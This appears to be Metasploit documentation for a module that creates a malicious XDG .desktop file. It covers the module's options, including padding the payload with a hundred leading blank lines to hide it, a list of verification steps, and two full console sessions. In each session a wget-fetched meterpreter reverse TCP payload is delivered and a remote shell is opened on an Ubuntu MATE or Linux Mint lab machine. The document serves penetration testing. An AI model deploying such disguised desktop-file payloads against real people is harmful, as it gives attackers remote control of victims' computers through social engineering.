Vulnerable Application
This module creates a malicious XDG Desktop (.desktop) file.
On most modern systems, desktop files are not trusted by default. The user will receive a warning prompt that the file is not trusted when running the file, but may choose to run the file anyway.
The default file manager applications in some desktop environments may impose more strict execution requirements by prompting the user to set the file as executable and/or marking the file as trusted before the file can be executed.
Options
FILENAME
The desktop file name. (Default: msf.desktop)
APPLICATION_NAME
The application name. Some file managers will display this name instead of the file name. (Default: random)
Advanced Options
PrependNewLines
Prepend new lines before the payload. (Default: 100)
Verification Steps
On the Metasploit host:
Start msfconsole
Do: use exploit/multi/fileformat/xdg_desktop
Do: set filename [filename.desktop]
Do: set payload [payload]
Do: set lhost [lhost]
Do: set lport [lport]
Do: run
Do: handler -p [payload] -P [lport] -H [lhost]
On the target machine:
Open the msf.desktop file
If prompted, choose "Launch Anyway"
Scenarios
Ubuntu MATE 24.04.2 (x86_64)
msf > use exploit/multi/fileformat/xdg_desktop
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
lport => 4444
msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
FETCH_COMMAND => WGET
msf exploit(multi/fileformat/xdg_desktop) > run
[+] msf.desktop stored at /root/.msf4/local/msf.desktop
msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.
[*] Started reverse TCP handler on 192.168.200.130:4444
msf exploit(multi/fileformat/xdg_desktop) >
[*] Sending stage (3090404 bytes) to 192.168.200.193
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.193:52462) at 2025-07-29 03:29:10 -0400
msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : linuxmint-mate-24-04.2-desktop-amd64
OS : Ubuntu 24.04 (Linux 6.14.0-24-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Linux Mint 22.1 (MATE) (x86_64)
msf > use exploit/multi/fileformat/xdg_desktop
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
lport => 4444
msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
FETCH_COMMAND => WGET
msf exploit(multi/fileformat/xdg_desktop) > run
[+] msf.desktop stored at /root/.msf4/local/msf.desktop
msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.
[*] Started reverse TCP handler on 192.168.200.130:4444
msf exploit(multi/fileformat/xdg_desktop) >
[*] Sending stage (3090404 bytes) to 192.168.200.189
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.189:35162) at 2025-07-29 02:45:34 -0400
msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : 192.168.200.189
OS : LinuxMint 22.1 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
